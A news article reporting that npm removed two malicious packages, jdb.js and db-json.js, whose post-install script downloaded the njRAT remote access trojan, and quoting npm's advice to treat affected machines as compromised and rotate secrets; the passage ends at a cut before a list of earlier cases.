Malicious npm packages caught installing remote access trojans

JavaScript and Node.js developers who installed the jdb.js and db-json.js packages were infected with the njRAT malware.

istock-519335916.jpg

the-lightwriter, Getty Images/iStockphoto

The security team behind the "npm" repository for JavaScript libraries removed two npm packages this Monday for containing malicious code that installed a remote access trojan (RAT) on the computers of developers working on JavaScript projects.

The name of the two packages was jdb.js and db-json.js., and both were created by the same author and described themselves as tools to help developers work with JSON files typically generated by database applications.

SEE: Meet the hackers who earn millions for saving the web, one bug at a time (cover story PDF) (TechRepublic)

Both packages were uploaded on the npm package registry last week and were downloaded more than 100 times before their malicious behavior was detected by Sonatype, a company that scans package repositories on a regular basis.

According to Sonatype's Ax Sharma, the two packages contained a malicious script that executed after web developers imported and installed any of the two malicious libraries.

The post-install script performed basic reconnaissance of the infected host and then attempted to download and run a file named patch.exe (VT scan) that later installed njRAT, also known as Bladabindi, a very popular remote access trojan that has been used in espionage and data theft operations since 2015.

To make sure the njRAT download wouldn't have any issues, Sharma said the patch.exe loader also modified the local Windows firewall to add a rule to whitelist its command and control (C&C) server before pinging back its operator and initiating the RAT download.

All of this behavior was contained in the jdb.js package only, while the second package, db-json.js, loaded the first in an attempt to disguise its malicious behavior.

Npm security team: Change all passwords

Since infections with any type of RAT-like malware are considered severe incidents, in security alerts on Monday, the npm security team advised web developers to consider their systems as fully compromised, if they installed any of the two packages.

"Any computer that has this package installed or running should be considered fully compromised," the npm team said.

"All secrets and keys stored on that computer should be rotated immediately from a different computer.

"The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it," they also added.

Constant onslaught

While the npm security team publishes security advisories on a weekly basis, most of them are usually for vulnerabilities in a package's code that may be exploited in the future.

However, since late August, the npm security team has been seeing an increased amount of npm libraries that have been intentionally put together to steal data from infected systems, suggesting that several theat actors are now interested in compromising programmers' workstations in an attempt to breach and steal credentials for sensitive projects, source code and intellectual property, or even prepare larger supply chain attacks.

Previous cases include: